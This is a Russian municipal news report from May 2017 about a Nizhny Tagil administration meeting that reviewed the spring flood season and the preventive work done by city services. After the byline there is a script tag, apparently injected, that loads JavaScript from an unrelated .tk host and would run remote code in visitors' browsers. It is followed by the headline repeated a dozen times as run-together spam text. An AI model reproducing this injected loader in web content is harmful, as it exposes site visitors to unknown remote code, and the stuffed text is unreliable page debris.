Прохождение весеннего половодья обсудили в администрации Нижнего Тагила

29.05.2017 09:53

Глава Нижнего Тагила Сергей Носов провел совещание по вопросу о прохождении весеннего половодья на территории Нижнего Тагила в 2017 году, сообщает пресс-служба муниципалитета.
С основным докладом о выполнении плана мероприятий по организации безаварийного пропуска весеннего половодья на территории города выступил начальник отдела гражданской защиты населения Администрации города Андрей Жбанов. Он рассказал о предпаводковой работе организаций, эксплуатирующих гидротехнические сооружения, которая была начата с 16 января 2017 года, обследованиях и ремонтах ГТС, восстановлении подпорной стенки на территории завода-музея им. Куйбышева. Также Андрей Владимирович напомнил о широкой информационной кампании по предупреждению жителей, которая в течение всего паводкоопасного периода велась отделом по работе со СМИ и информационно-аналитической работе совместно с редакциями городских телекомпаний, газет, радиостанций и интернет-изданий.
Докладчик отметил профилактическую и просветительскую работу единой диспетчерской службы, управления промышленности администрации города, МЧС, центра защиты населения, администраций районов и территориального управления, организаций УБТ-Сервис и Тагилдорстрой. В результате всего комплекса принятых мер, по словам Андрея Жбанова, не допущены подтопление и нарушения в работе объектов жизнеобеспечения. Все решения противопаводковой подкомиссии КЧС и ОПБ города выполнены. В то же время начальник отдела гражданской защиты населения назвал ряд проблем, которые требуют принятия решений не только муниципалитетом, но и правительством Свердловской области.
По словам Сергея Носова, паводок прошлого года нас серьезно напугал, в результате в этом году мероприятия по подготовке к нему были проведены на очень высоком уровне.Такая работа должна стать системой.
В.Сонин.

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Прохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего ТагилаПрохождение весеннего половодья обсудили в администрации Нижнего Тагила